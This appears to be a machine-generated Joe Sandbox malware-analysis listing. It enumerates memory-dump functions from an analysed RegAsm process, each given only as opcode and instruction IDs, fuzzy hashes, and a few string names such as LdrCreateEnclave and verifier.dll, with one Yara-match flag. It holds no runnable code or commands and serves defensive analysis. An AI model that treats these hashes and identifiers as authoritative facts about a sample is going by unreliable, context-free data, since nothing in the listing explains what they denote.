                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PATH
                                                                                                                          • API String ID: 0-1036084923
                                                                                                                          • Opcode ID: 45a0e484e9592fc0476d059284d18f971c6beec4e9aed7bed64b95a58ac8df29
                                                                                                                          • Instruction ID: 6992dd568ff2c640b4f65b9cc1fc3aea10a1888767a91b057dc3f28f0d071ecb
                                                                                                                          • Opcode Fuzzy Hash: 45a0e484e9592fc0476d059284d18f971c6beec4e9aed7bed64b95a58ac8df29
                                                                                                                          • Instruction Fuzzy Hash: 05F1AE71E802189BCF25CFA8D880AFEB7B6FF88744F559069E552EB250D7349851CF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c0ceb24f8ac8228c1ac66b102262dfd3ffc169bcaa5533b3f3022b1ba473afb2
                                                                                                                          • Instruction ID: acb1c573023512d39481b0b341bcb6a81c6280508465c0a0a68b4af874bcb93e
                                                                                                                          • Opcode Fuzzy Hash: c0ceb24f8ac8228c1ac66b102262dfd3ffc169bcaa5533b3f3022b1ba473afb2
                                                                                                                          • Instruction Fuzzy Hash: FA415B74D412889EDB20CFA9D880AAEBBB5FB49380F54426ED659E7201C7309904CF60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 0-3916222277
                                                                                                                          • Opcode ID: 4b8194aadcd9df7b90dfdbdce38392fe6d4f8765947a89b0cbaf1d745c2938e9
                                                                                                                          • Instruction ID: 54fecd772b9fbd6282b2a5db135720d83e55785c164589037d7ad2dd1b2f9191
                                                                                                                          • Opcode Fuzzy Hash: 4b8194aadcd9df7b90dfdbdce38392fe6d4f8765947a89b0cbaf1d745c2938e9
                                                                                                                          • Instruction Fuzzy Hash: 3BA12A31A84268ABDF268A64C840BFE67E55F4535CF04E099FD8BBB281D7F48D45CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: GlobalTags
                                                                                                                          • API String ID: 0-1106856819
                                                                                                                          • Opcode ID: 95787c1b70b70202df69e2893eed1a31166c128b794f5d2bf9033f0bee420681
                                                                                                                          • Instruction ID: 229414072a0aaac5b1ef033ee22e1fadec18ba7063675005a3bf12dc5f80f3ad
                                                                                                                          • Opcode Fuzzy Hash: 95787c1b70b70202df69e2893eed1a31166c128b794f5d2bf9033f0bee420681
                                                                                                                          • Instruction Fuzzy Hash: 15719375E0021ADFDF24CF98D590AADB7B6BF48794F54812EEA16E7240DB349841CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                          • Instruction ID: 26e9e58a4f3f4806ef0a1bf3c93f137aa6accb172cd799d9eb2d924fd784c13b
                                                                                                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                          • Instruction Fuzzy Hash: 4C619C71D40259ABDF21DFA5C840BEEBBF5FF84754F11816AE921B72A0D7749A00CB60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                          • Instruction ID: f7fed60ccc5a082fd120038654514280a0e3d1a798c177e669160323dc8c9c92
                                                                                                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                          • Instruction Fuzzy Hash: 7E51DC72A04341AFE7219F24DC44F6BB7E8FB84794F400A29BB8197690D7B0ED04CBA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EXT-
                                                                                                                          • API String ID: 0-1948896318
                                                                                                                          • Opcode ID: 6ef9d3f33533840f6c4f8f539209d7c6bddb3a1ae670c5de22e62f7d95157a2e
                                                                                                                          • Instruction ID: db2cd208e3f54c75913ee68198d20c8ecd6614d41d7912061aadbe91eeff0741
                                                                                                                          • Opcode Fuzzy Hash: 6ef9d3f33533840f6c4f8f539209d7c6bddb3a1ae670c5de22e62f7d95157a2e
                                                                                                                          • Instruction Fuzzy Hash: 9941B4715483419BD750DA74C840BAFB7D9AF88718F48992DF784E7190EB74EA04CB93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PreferredUILanguages
                                                                                                                          • API String ID: 0-1884656846
                                                                                                                          • Opcode ID: ce5d47debb55e7b197c961dd790ee8646859216fe8327155a6f0832c4ddb4155
                                                                                                                          • Instruction ID: e60201395c8b5ad5aeb4863cccec5d8e110ed0552852ccd308dc3461ec640bc9
                                                                                                                          • Opcode Fuzzy Hash: ce5d47debb55e7b197c961dd790ee8646859216fe8327155a6f0832c4ddb4155
                                                                                                                          • Instruction Fuzzy Hash: 7341C436D00219EBEF21DA94D840FEEB7B9AF44798F05416AEB11E7250D734DE40CBA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BinaryHash
                                                                                                                          • API String ID: 0-2202222882
                                                                                                                          • Opcode ID: 5b6ae0ac856a79d35b1c64558288603ce2614f08b8b726adf5fc04687464cd6c
                                                                                                                          • Instruction ID: 973b86f1563d67cab21461802ee1c534010d17f99514bbe3b19bbdf17652e14e
                                                                                                                          • Opcode Fuzzy Hash: 5b6ae0ac856a79d35b1c64558288603ce2614f08b8b726adf5fc04687464cd6c
                                                                                                                          • Instruction Fuzzy Hash: CE4125B1D0063CAADB21DA60CC84FDEB77DAB45754F0045E6EB09AB140DB749E89CFA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: verifier.dll
                                                                                                                          • API String ID: 0-3265496382
                                                                                                                          • Opcode ID: bbd99a665e6cf31eb5156793930e187c8e3b2a363a81a468cef1d2d28d6515c1
                                                                                                                          • Instruction ID: 0656e8438ea8e3b3aedb1593236681420e1dfc63e1c26b8547769f6657fd0a0a
                                                                                                                          • Opcode Fuzzy Hash: bbd99a665e6cf31eb5156793930e187c8e3b2a363a81a468cef1d2d28d6515c1
                                                                                                                          • Instruction Fuzzy Hash: 5E31C271F402019FDB249F389864F36B6E6EB48394FD4943AE644CF280E7B08C848790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: kLsE
                                                                                                                          • API String ID: 0-3058123920
                                                                                                                          • Opcode ID: 6d22e7daffbc6d9e48b89ecc41583ec1745a28704381ea599d3cf409610364d8
                                                                                                                          • Instruction ID: a49d31ea78d3d12cd3c74e597001b345d902989f0d91170da8a39d91ea4dc6c0
                                                                                                                          • Opcode Fuzzy Hash: 6d22e7daffbc6d9e48b89ecc41583ec1745a28704381ea599d3cf409610364d8
                                                                                                                          • Instruction Fuzzy Hash: 26414B75D8234946E721BB74F884B65FB9BAB40BE8F240919EE51CA1C1C7B44491CF91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Flst
                                                                                                                          • API String ID: 0-2374792617
                                                                                                                          • Opcode ID: fb4cac408a4d83d4d226a9ec2e43d4e405620945ece3b9a894e279b8b31fbc61
                                                                                                                          • Instruction ID: e485c6188956f25267c08e03aa2c79ada6f819493f92f5c00347b0fbe67f6614
                                                                                                                          • Opcode Fuzzy Hash: fb4cac408a4d83d4d226a9ec2e43d4e405620945ece3b9a894e279b8b31fbc61
                                                                                                                          • Instruction Fuzzy Hash: 6F41CEB1A09305DFC314CF28C480A26FBE4EF49794F5482AEEA59CF241E731D946CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx
                                                                                                                          • API String ID: 0-89312691
                                                                                                                          • Opcode ID: c901afbe0733af11121cd6e71b53dac114e8ad701b24cfe1cee6f968cce82a2c
                                                                                                                          • Instruction ID: 87ac2d2177e89bfcc18785ef5f55b49dc2b07285fa0df040e7b45138ace3b01f
                                                                                                                          • Opcode Fuzzy Hash: c901afbe0733af11121cd6e71b53dac114e8ad701b24cfe1cee6f968cce82a2c
                                                                                                                          • Instruction Fuzzy Hash: 4611B2307C9A028BEF28491D88507B6B695EB9236CFB4E52AF563CB390DB71DC41C391
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrCreateEnclave
                                                                                                                          • API String ID: 0-3262589265
                                                                                                                          • Opcode ID: ea0acd798b92257717c3b95f843852c6efa3f431fbe098f61d8af68ceb982328
                                                                                                                          • Instruction ID: 11e4fa5496d4d724b04f93a1967956f2628deafd9c61e3c040a041a979296ff4
                                                                                                                          • Opcode Fuzzy Hash: ea0acd798b92257717c3b95f843852c6efa3f431fbe098f61d8af68ceb982328
                                                                                                                          • Instruction Fuzzy Hash: C12143B19483449BD310CF6AC809A5BFBE9EBD5B80F004A1EBA9487350D7B0D405CF92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e1514b5d27e48a9fd1f4d83b3a86817f10fd587420807ae121100e7da11aedf7
                                                                                                                          • Instruction ID: 7157b2914fee1f6fe8ca28d9551332354ca2e1e052c3469758ed2b93a7b65931
                                                                                                                          • Opcode Fuzzy Hash: e1514b5d27e48a9fd1f4d83b3a86817f10fd587420807ae121100e7da11aedf7
                                                                                                                          • Instruction Fuzzy Hash: BD822272F102188BDB58CFADD8916DDB7F2EF8C314B19802DE41AEB345DA34AC568B45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fb8348e3ff0cec41c4af9a9e8fe9d0bfd19a8885cd8b214b4d06d6931997d2f5
                                                                                                                          • Instruction ID: f7b5c535274a60302b2c26cb9fe8b0bb7340cd00b92bd1e51835ed5c72df3797
                                                                                                                          • Opcode Fuzzy Hash: fb8348e3ff0cec41c4af9a9e8fe9d0bfd19a8885cd8b214b4d06d6931997d2f5
                                                                                                                          • Instruction Fuzzy Hash: B462C372D0466AAFCF28CF44D4905AEFB62FE42388B85C55CC99A6B604D371B95CCBD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3f7e8159e0bc1ec5b370e73def0ba24ef7fd7417e9ccad1581279b93ad021793
                                                                                                                          • Instruction ID: 73440839ef5c29df09f901a84591d4c3ba59ebfc0954062c9d60768ad242fd0c
                                                                                                                          • Opcode Fuzzy Hash: 3f7e8159e0bc1ec5b370e73def0ba24ef7fd7417e9ccad1581279b93ad021793
                                                                                                                          • Instruction Fuzzy Hash: AF427EB1E006168FDB1ADF59C890ABEF7B2FF88354B148559DA52AB350D734E842CF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                          • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                          • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                          • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3c309fbc0725b076c921ecdb3bbfe1a407500ab46f21e77260f44f1419f70dca
                                                                                                                          • Instruction ID: c1bdf59dcfdd56bbba0768d19c3a1b0ae92183e652560e1fcbaa7be5d7a9bec7
                                                                                                                          • Opcode Fuzzy Hash: 3c309fbc0725b076c921ecdb3bbfe1a407500ab46f21e77260f44f1419f70dca
                                                                                                                          • Instruction Fuzzy Hash: 9032D776E00219DBCF14CFA8D990BBEBBB2FF54798F180069E905AB391D7359911CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba95ebdf63b886a1dfa783618c3cf3a5565b5dd196a6fd5cf7bcb379a0fc254f
                                                                                                                          • Instruction ID: 653ef81d0f95e3de11c9eee3a1fcc4781a9155f73ea3335419fd713aee13dc89
                                                                                                                          • Opcode Fuzzy Hash: ba95ebdf63b886a1dfa783618c3cf3a5565b5dd196a6fd5cf7bcb379a0fc254f
                                                                                                                          • Instruction Fuzzy Hash: C9425A75E002199FDB24CF69C885BADB7F6BF48384F14809AEA49EB241D7349D81DF60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6e74c49fd60d778dfd89b5c65f7c258ef294086ed4a7a98929e77f4aa6fd4d46
                                                                                                                          • Instruction ID: c1f0e91c8ece31b1355ee50ea40b127b5f8a91c58dbaa9b3f1f613c24b206241
                                                                                                                          • Opcode Fuzzy Hash: 6e74c49fd60d778dfd89b5c65f7c258ef294086ed4a7a98929e77f4aa6fd4d46
                                                                                                                          • Instruction Fuzzy Hash: 6B32F170A007558BDB24CF69C854BBEBBF6BF86388F14811DDA46DB284DBB5A841CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5bc432faeb59360ba35916d58969aff05e267c2b04bdff64bf87929120dcfa1c
                                                                                                                          • Instruction ID: ac4c57b287a7f5dbfb6f5a7f8a36ae7f4283214559e035273f5cc052b94deacb
                                                                                                                          • Opcode Fuzzy Hash: 5bc432faeb59360ba35916d58969aff05e267c2b04bdff64bf87929120dcfa1c
                                                                                                                          • Instruction Fuzzy Hash: D722E171B046508BDB25EF29C094376F7F1EF44384F18849BDA968F289E335E492DB61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d905dfd181299dbdd22b132eadf57504058a18900e5e870b52e04d32f9ad218a
                                                                                                                          • Instruction ID: 506afdbb7b166bea454ff20f8c588d2c13c9bcd187e71bd3efe428c88ed9edf3
                                                                                                                          • Opcode Fuzzy Hash: d905dfd181299dbdd22b132eadf57504058a18900e5e870b52e04d32f9ad218a
                                                                                                                          • Instruction Fuzzy Hash: CD229275F002168FCB19CF58C4A0AABB7B2BF89394F15856DDA5ADB344DB30E941CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3ba3d358e3a38cdf34014809b4c5381e8a2baf481ec5a9b3c6ff6dad4d27bbe2
                                                                                                                          • Instruction ID: d794ab339e4257e5f6f6c4fc9a1cc92fbde08ceb0d377c8b8e3d693947ff0713
                                                                                                                          • Opcode Fuzzy Hash: 3ba3d358e3a38cdf34014809b4c5381e8a2baf481ec5a9b3c6ff6dad4d27bbe2
                                                                                                                          • Instruction Fuzzy Hash: 37228071D0021A9BDB10DFA4C890BAEB7B6FF48340F148669DF159B285EB74E945CF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 443dc24d3b5c9bbdfdc6f85879ad46a689a62f05f7738654282ce813d43d409e
                                                                                                                          • Instruction ID: 21a4580e559cc2044b8fe7154727a7a8d698313747e25ec3ca3b2f4bd09b6013
                                                                                                                          • Opcode Fuzzy Hash: 443dc24d3b5c9bbdfdc6f85879ad46a689a62f05f7738654282ce813d43d409e
                                                                                                                          • Instruction Fuzzy Hash: 7D22B5B5B147118FD718CF18C4A0A2AB3E2FF89354F158A6DEA96CB354D730E845CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fe91288eb63db400928c638fb97338d1f102c91df281235f6c44daaa3177342a
                                                                                                                          • Instruction ID: b0f521d27c44b9d6f56fb7ba1e1f592d3a759fbbc5fe9d389f624e4589b6cfe2
                                                                                                                          • Opcode Fuzzy Hash: fe91288eb63db400928c638fb97338d1f102c91df281235f6c44daaa3177342a
                                                                                                                          • Instruction Fuzzy Hash: 75225E71E00116DBCB14CFA5C5C0ABEFBF2BF44784B54805AEA45AB291E774ED81DB60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 90afa6f8ad75701413bd67216e3f0f4ffbd23cef0410079fb042b5f8135e9ae7
                                                                                                                          • Instruction ID: 91567bc90192da34be2c077d3afbb04a331ddbf9676782ea4895d27e4445ea8f
                                                                                                                          • Opcode Fuzzy Hash: 90afa6f8ad75701413bd67216e3f0f4ffbd23cef0410079fb042b5f8135e9ae7
                                                                                                                          • Instruction Fuzzy Hash: AA02EFB5B046558FDB14CF2AC470375B7F2BF85384B09819AEE96CB282D734E942DB60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b3ee776b327819d1838416f5e6a083b15781e1ccc5decf84afea56db2d36a774
                                                                                                                          • Instruction ID: b8f50ee63886cc42ad241da07d60830f3024203df08bd0cd2f3ff94782ff5d71
                                                                                                                          • Opcode Fuzzy Hash: b3ee776b327819d1838416f5e6a083b15781e1ccc5decf84afea56db2d36a774
                                                                                                                          • Instruction Fuzzy Hash: ACF1F672F006158FCB1ACF6AC9906BEFBF6AF98244719416DD956DB380E734E901CB50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                          • Instruction ID: 6b87f2edc94ecfc8f025fa78c0d2476a89f8df13b2344e2d51824bb9d65d0a67
                                                                                                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                          • Instruction Fuzzy Hash: BA026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f07ac8f9af94595f6a2a651d0f2aadefe3314b9af15fc96728537b2589c0a76d
                                                                                                                          • Instruction ID: 993974fda5283842751a9dd4b53f502f7934aa1bf9bdbcd99656936116ea6ba8
                                                                                                                          • Opcode Fuzzy Hash: f07ac8f9af94595f6a2a651d0f2aadefe3314b9af15fc96728537b2589c0a76d
                                                                                                                          • Instruction Fuzzy Hash: 25F106B3E005269BCB19CF6AC9A05BDFBF5AF45340B194269D966EB380D734DE40CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 53e00a8c2a435fd092eb6e8b16b4108dce47593fc3f2beb6a4bbf7aec66c4ff0
                                                                                                                          • Instruction ID: e9202993cd754124bdc5322ea67aa27f142d974a561040d730414f4284d45335
                                                                                                                          • Opcode Fuzzy Hash: 53e00a8c2a435fd092eb6e8b16b4108dce47593fc3f2beb6a4bbf7aec66c4ff0
                                                                                                                          • Instruction Fuzzy Hash: 4FF19F70E00219DFDB14DFA4C890BAEB7B5FF48344F2485A9DA05EB245EB34DA45CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
